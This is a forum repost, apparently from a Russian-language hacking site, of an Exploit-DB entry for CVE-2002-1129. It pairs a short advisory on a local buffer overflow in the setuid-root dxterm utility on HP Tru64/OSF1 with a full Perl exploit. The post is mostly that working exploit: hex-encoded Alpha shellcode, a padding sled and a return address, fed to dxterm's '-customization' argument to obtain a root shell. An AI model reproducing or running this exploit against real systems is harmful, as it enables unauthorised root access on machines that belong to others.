Exploit HP Tru64/OSF1 DXTerm - Local Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21807
Проверка EDB
  1. Пройдено
Автор
STRIPEY
Тип уязвимости
LOCAL
Платформа
UNIX
CVE
cve-2002-1129
Дата публикации
2002-07-03
Код:
source: https://www.securityfocus.com/bid/5746/info

The HP Tru64/OSF1 dxterm utility is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient checking of command line input supplied via the "-xrm" parameter. This parameter serves the same purpose as the "-customization" command line parameter, which is also not sufficiently checked. 

Since this utility is installed setuid root, code execution that results from successful exploitation of this issue will yield root privileges on the system.

#!/usr/bin/perl -w
#
# Tru64 5.1 /usr/bin/X11/dxterm
#
# stripey ([email protected]) - 03/07/2002
#

($offset) = @ARGV,$offset || ($offset = 0);

$ret_addr = pack("ll",(0x4001c828+$offset),0x1);

$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

$buf_a .= pack("l",0x47ff041f)x2048;
$buf_a .= $sc;
$buf_a .= $ret_addr;

exec("/usr/bin/X11/dxterm","-customization",$buf_a);
 
Источник
www.exploit-db.com

Похожие темы